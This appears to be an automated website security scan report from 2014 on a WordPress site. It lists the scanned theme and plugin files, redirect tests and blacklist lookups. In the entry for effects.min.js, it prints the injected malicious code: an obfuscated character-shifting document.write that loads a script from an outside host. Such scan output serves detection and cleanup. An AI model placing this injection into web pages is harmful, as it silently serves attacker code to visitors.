Scanned pages/files
Request | Server response | Status |
http://www.grawerton.biz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 26 Jun 2014 21:38:09 GMT Location: http://grawerton.biz/ Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://grawerton.biz/xmlrpc.php X-Powered-By: PHP/5.2.17 | clean |
http://grawerton.biz/ | 200 OK Content-Length: 27499 Content-Type: text/html | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/more_moo.js | 200 OK Content-Length: 134974 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/loader.js | 200 OK Content-Length: 1439 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/effects.min.js | 200 OK Content-Length: 172 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- js-tools --> s=0;while(s<62)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00xxx/xfmdpnfsvt/dpn0hgy0tubu/qiq#?=0tdsjqu?'.charCodeAt(s++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/prettyPhoto.js | 200 OK Content-Length: 30486 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery-ui-1.8.4.custom.min.js | 200 OK Content-Length: 27494 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery.form.js | 200 OK Content-Length: 22844 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/jquery.validate.js | 200 OK Content-Length: 36479 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/js/cufon-yui.js | 200 OK Content-Length: 18263 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/themes/duotive-one/fonts/ | 403 Forbidden Content-Length: 317 Content-Type: text/html | clean |
http://grawerton.biz/test404page.js | 404 Not Found Content-Length: 12890 Content-Type: text/html | clean |
http://grawerton.biz/wp-includes/js/jquery/jquery.js?ver=1.4.2 | 200 OK Content-Length: 72194 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 22597 Content-Type: application/x-javascript | clean |
http://grawerton.biz/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.3 | 200 OK Content-Length: 5802 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grawerton.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Jun 2014 21:38:10 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://grawerton.biz/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: grawerton.biz
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Jun 2014 21:38:10 GMT
Server: nginx/1.0.15
Content-Type: text/html; charset=UTF-8
X-Pingback: http://grawerton.biz/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: grawerton.biz
Referer: http://www.google.com/search?q=grawerton.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grawerton.biz
Referer: http://www.google.com/search?q=grawerton.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grawerton.biz
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://grawerton.biz/
Result: grawerton.biz is not infected or malware details are not published yet.
Result: grawerton.biz is not infected or malware details are not published yet.